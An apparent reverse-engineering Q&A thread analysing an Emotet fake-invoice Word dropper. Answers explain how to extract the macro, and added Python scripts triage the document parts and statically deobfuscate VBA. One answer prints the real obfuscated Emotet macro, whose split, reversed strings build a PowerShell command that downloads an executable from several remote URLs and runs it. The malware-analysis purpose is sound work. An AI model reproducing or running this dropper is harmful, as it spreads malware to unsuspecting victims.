Emotet invoice: what is the embedded file inside the Word document?













This pastebin hosts current URLs hosting the fake invoice of Emotet malware, which is the dropper part of the malware.

The document is an Office Open XML, and there are two large non-textual segments in it.

I can't make any sense of the other segment.

One of them is this: [image]

I assume the other one contains at least some VB script and something else, but it decodes (assuming base64 like the jpg part) to nothing that `file` recognizes.

binary-analysis malware

asked yesterday
alecail










  • I got no idea about the nature of this data - maybe the string at the very end (Project tvfvpv autoopen in wide / utf16) could be a clue

    – Nordwald
    yesterday



















2 Answers
Without reviewing the file itself, other than a VB script used as a macro, the second part is more likely an obfuscated/encrypted executable file of some sort.

However, since it's evident macros are used, the executable file (either a PE or a script) is probably at least somewhat obfuscated and will only be decoded/decrypted before it's dropped to disk or something similar.

Statically, your safest bet would be extracting the macro (that isn't hard; macros are pretty noticeable as far as the standard is concerned) and reversing the decoding/deobfuscating method used.

An easier approach would be to let the document drop the executable by opening it and letting the macros run inside a VM, optionally using something like Process Explorer/API Monitor to catch the dropped file.

answered yesterday
NirIzr
























  • Macros: pastebin.com/NtDy1qtD

    – Nordwald
    yesterday











  • @Nordwald Thanks. Just for completeness, oletools' olevba was able to extract the VB file.

    – alecail
    yesterday
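Added example (my code, not the asker's or either answerer's): a triage script for the two "non-textual segments" the question describes. It assumes the file is either a .docx ZIP or the single-file Flat OPC XML form, where Word stores binary parts base64-encoded inside pkg:binaryData elements; which of the two the asker has is a guess. The sample documents it builds are constructed from magic bytes plus zero padding, not real Emotet artefacts. The point it makes for this thread: base64 inside XML is line-wrapped, so decode it only after stripping whitespace, then compare the first bytes against known magics. An OLE header (D0 CF 11 E0 A1 B1 1A E1) means the segment is the vbaProject.bin macro container, which olevba (mentioned in the comment above) can parse further.

```python
import base64
import io
import re
import sys
import zipfile

# Magic bytes worth recognising in Office document parts.
MAGICS = [
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE compound file (CFB)"),
    (b"\xff\xd8\xff", "JPEG image"),
    (b"\x89PNG\r\n\x1a\n", "PNG image"),
    (b"PK\x03\x04", "ZIP container"),
    (b"MZ", "PE executable"),
]

# Flat OPC (single-file Word XML) stores binary parts as base64 inside <pkg:binaryData>.
PART_RE = re.compile(rb'<pkg:part\b[^>]*pkg:name="([^"]+)"[^>]*>(.*?)</pkg:part>', re.S)
BIN_RE = re.compile(rb"<pkg:binaryData>(.*?)</pkg:binaryData>", re.S)


def identify(blob):
    """Return a label for the first matching magic, else 'unknown'."""
    for magic, label in MAGICS:
        if blob.startswith(magic):
            return label
    return "unknown"


def decode_b64(text):
    """Base64 in XML is line-wrapped: strip all whitespace before decoding,
    otherwise the result is truncated garbage that `file` will not recognise."""
    return base64.b64decode(re.sub(rb"\s+", b"", text))


def triage_flat_opc(xml_bytes):
    """(part name, decoded size, label) for every binary part of a Flat OPC document."""
    findings = []
    for name, body in PART_RE.findall(xml_bytes):
        m = BIN_RE.search(body)
        if m:
            blob = decode_b64(m.group(1))
            findings.append((name.decode(), len(blob), identify(blob)))
    return findings


def triage_docx(zip_bytes):
    """A .docx is a ZIP; every non-XML part is a candidate binary (media, vbaProject.bin, OLE objects)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.endswith((".xml", ".rels")):
                continue
            blob = zf.read(info.filename)
            findings.append((info.filename, len(blob), identify(blob)))
    return findings


def triage(doc_bytes):
    """Dispatch on the container: ZIP magic means .docx, anything else is treated as Flat OPC XML."""
    if doc_bytes.startswith(b"PK\x03\x04"):
        return triage_docx(doc_bytes)
    return triage_flat_opc(doc_bytes)


def macro_parts(findings):
    """Names of parts that hold the VBA project (what olevba would parse next)."""
    return [name for name, _, _ in findings if name.lower().endswith("vbaproject.bin")]


# Constructed sample parts: only the magic bytes are real, the rest is zero padding.
FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 64
FAKE_OLE = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 504


def build_sample_flat_opc():
    """Constructed Flat OPC document with one image part and one vbaProject.bin part."""
    def part(name, blob):
        # encodebytes wraps at 76 columns, which is exactly the whitespace decode_b64 has to strip
        return (b'<pkg:part pkg:name="' + name.encode() + b'" pkg:contentType="application/octet-stream">'
                b"<pkg:binaryData>" + base64.encodebytes(blob) + b"</pkg:binaryData></pkg:part>")
    return (b'<?xml version="1.0"?><pkg:package xmlns:pkg="http://schemas.microsoft.com/office/2006/xmlPackage">'
            + part("/word/media/image1.jpeg", FAKE_JPEG) + part("/word/vbaProject.bin", FAKE_OLE)
            + b"</pkg:package>")


def build_sample_docx():
    """Constructed .docx ZIP with the same two binary parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/media/image1.jpeg", FAKE_JPEG)
        zf.writestr("word/vbaProject.bin", FAKE_OLE)
    return buf.getvalue()


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_flat_opc()
    findings = triage(data)
    for name, size, kind in findings:
        print(f"{name}: {size} bytes, {kind}")
    print("macro container(s):", macro_parts(findings))
```

Run it as `python triage.py suspicious.xml` on a copy of the file inside an isolated VM; with no argument it triages the constructed sample. It only reads bytes and never opens the document in Word, so no macro can run during triage.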



















The VBA appears to be something like this; the functions appear to be useless, and zillnp appears to take this string:

[image]

You can copy-paste the strings and concatenate them:



Sub foo()
zwrqd = "c:on" + "jzi" + "oi" + "izwolr" + "poic" + "wo" + ".." + ".."
szrtncm = "..win" + "dow" + "ssys" + "tem32" + "cmd." + "exe /c" + " %Pro" + "gram"
uvkplhz = "Data" + ":~0,1" + "%%Pro" + "gra" + "mData:" + "~9," + "2% /" + "V:ON/" + "C" + Chr(34) + "set"
oujod = " SiQ=;" + "'cjq" + "hpb'=" + "qijm" + "nd$}}" + "{hct" + "ac}};"
kbuitlk = "kaerb" + ";'bchk" + "zfb'=" + "dqk" + "zr$" + ";hkjzj" + "lz$ me" + "tI-e" + "kovnI{"
bjzzhsa = " )00" + "004 eg" + "- htg" + "nel.)h" + "kjzjlz" + "$ m" + "etI-t" + "eG((" + " fI;'"


hzipdp = "jrkj" + "ik'=ci" + "ikdj$" + ";)hkjz" + "jlz$" + " ,qjc" + "aki$(" + "eliFd" + "aoln"
wcwhr = "woD.ir" + "hwidj" + "${yrt" + "{)ujb" + "wa$ " + "ni qj" + "cak" + "i$(h"
rmflwpm = "caero" + "f;'" + "exe.'" + Chr(43) + "zbw" + "nifi$" + Chr(43) + "''" + Chr(43) + "pmet" + ":vne"
wuvcz = "$=hkj" + "zjlz" + "$;'ziw" + "mvv'=p" + "zrifo"
kqwok = "h$;'9" + "04' = " + "zbw" + "nifi$;" + "'sc" + "jmbw'" + "=fm" + "sqvii$" + ";)'@"
wzkwjw = "'(t" + "ilpS" + ".'41" + "fpege" + "LDa"
hrzqojk = "jCgKn" + "c/mo" + "c.sse" + "nisub" + "rusoh."
zpftzo = "www//:" + "ptth@" + "Mw6O6" + "3Df_" + "Cm066C" + "cdkU" + "7o/moc"

rnncbhd = ".ai" + "cizy" + "hp.ww" + "w//:pt" + "th@j" + "7OEo_7"
zihij = "MhAbZ" + "p6jnH" + "p/z" + "t.oc.s" + "keeg"
dwpit = "t.liam" + "//:" + "ptt" + "h@8or1" + "uzsd" + "Z8vi" + "e/RXI/" + "sed" + "ulcni-"
wccvfj = "pw/moc" + ".srev" + "ireht" + "ybkram" + "dnal//" + ":ptth" + "@R8Fd3"
zuvtjrq = "N9U" + "mbY" + "BzI/te" + "n.en" + "onil"
afactw = "etoh." + "www/" + "/:ptt" + "h'=ujb" + "wa$;" + "tnei"
worhm = "lCbeW." + "teN t" + "cejbo-" + "wen" + "=ir" + "hwidj$" + ";'imsi"
vaipzq = "zuu'=i" + "ijir" + "wb$ ll" + "%1,3-~" + ":PME" + "T%h%" + "1,4-" + "~:EMA" + "NNOI"
zcdjvo = "SSES%r" + "%1,5~" + ":CILB" + "UP%wo" + "p&&" + "for /"
vwqmd = "L %h i" + "n (65" + "7,-1" + ",0)" + "do s" + "et " + "nu=!"
tlpisj = "nu!!S" + "iQ:~" + "%h," + "1!&" + "&if %h" + " eq" + "u 0 e" + "cho !n"
nsfmr = "u:~-6" + "58!|" + " cmd" + Chr(34) + " "


uhdurz = zwrqd + szrtncm + uvkplhz + oujod + kbuitlk + bjzzhsa
jitovh = hzipdp + wcwhr + rmflwpm + wuvcz + kqwok + wzkwjw + hrzqojk + zpftzo
wwiqv = rnncbhd + zihij + dwpit + wccvfj + zuvtjrq + afactw + worhm + vaipzq + zcdjvo + vwqmd + tlpisj + nsfmr


MsgBox (uhdurz + jitovh + wwiqv)

End Sub





answered yesterday
blabb
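Added example (mine, not blabb's code and not the macro author's): the macro above hides its command line by splitting it into short literals, inserting quotes via Chr(34), and, once cmd.exe runs it, reversing a stored string with a `for /L %h in (657,-1,0) do set nu=!nu!!SiQ:~%h,1!` loop. The Python below emulates the VBA concatenations statically (nothing is executed) and undoes that reversal idiom so the real command can be read. It runs on a constructed macro of the same shape whose payload is a harmless echo; the variable names a to d, Q and nu are made up for the sample, and the sink list (MsgBox, Shell, CreateObject, Eval) is an assumption about where such strings end up in a live macro.

```python
import re

# One token of a VBA concatenation: a string literal, Chr(n), or a variable name.
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|Chr\((\d+)\)|([A-Za-z_]\w*)')
ASSIGN_RE = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
# Calls whose argument is the rebuilt string (MsgBox in the answer; Shell/CreateObject in a live sample).
SINK_RE = re.compile(r"^\s*(MsgBox|Shell|CreateObject|Eval)\b\s*\(?(.+?)\)?\s*$", re.I)
# cmd.exe idiom: set VAR=<reversed text>&&for /L %h in (N,-1,0) do set out=!out!!VAR:~%h,1!
REVERSE_LOOP_RE = re.compile(
    r"set\s+(\w+)=(.*?)&&for\s+/L\s+%(\w+)\s+in\s+\((\d+),-1,0\)\s+do\s+set\s+(\w+)=!\5!!\1:~%\3,1!",
    re.I | re.S)


def eval_concat(expr, env):
    """Evaluate a VBA expression made of literals, Chr() calls and known variables joined by + or &."""
    out = []
    for lit, code, ident in TOKEN_RE.findall(expr):
        if code:
            out.append(chr(int(code)))
        elif ident:
            out.append(env.get(ident, ""))
        else:
            out.append(lit.replace('""', '"'))  # VBA escapes a quote by doubling it
    return "".join(out)


def rebuild_macro(vba_text):
    """Walk the macro line by line, binding each assignment; return the variable table and sink arguments."""
    env, sinks = {}, []
    for line in vba_text.splitlines():
        m = SINK_RE.match(line)
        if m:
            sinks.append((m.group(1), eval_concat(m.group(2), env)))
            continue
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1)] = eval_concat(m.group(2), env)
    return env, sinks


def recover_reversed_payload(cmdline):
    """Undo the for /L (N,-1,0) loop: it copies characters N..0 of VAR, i.e. VAR[:N+1] reversed."""
    m = REVERSE_LOOP_RE.search(cmdline)
    if not m:
        return None
    payload, n = m.group(2), int(m.group(4))
    return payload[:n + 1][::-1]


def deobfuscate(vba_text):
    """For each sink call: the rebuilt command line and, if present, the un-reversed payload."""
    _, sinks = rebuild_macro(vba_text)
    return [{"sink": name, "command": cmd, "payload": recover_reversed_payload(cmd)} for name, cmd in sinks]


# Constructed macro with the same shape as the one in the answer, but a harmless payload ("echo hello, world!").
SAMPLE_MACRO = '''Sub foo()
a = "cmd.e" + "xe /V:ON" + " /C" + Chr(34) + "set Q="
b = "!dlrow" + " ,olleh" + " ohce"
c = "&&for /L %h in (" + "17,-1,0) do set n" + "u=!nu!!Q:~%h,1!"
d = "&&echo !nu:~-18!|" + "cmd" + Chr(34)
MsgBox (a + b + c + d)
End Sub
'''

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_MACRO
    for r in deobfuscate(text):
        print(f"{r['sink']}: {r['command']}")
        print("reversed payload:", r["payload"])
```

Feed it the olevba output (`python deob.py macro.vba`). Batch tricks that pull single characters out of environment variables, such as the %PUBLIC:~5,1% pieces in the answer, are left for the analyst to resolve; the emulator only rebuilds the strings and reverses the loop, which is enough to read the download URLs and the interpreter being invoked.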






















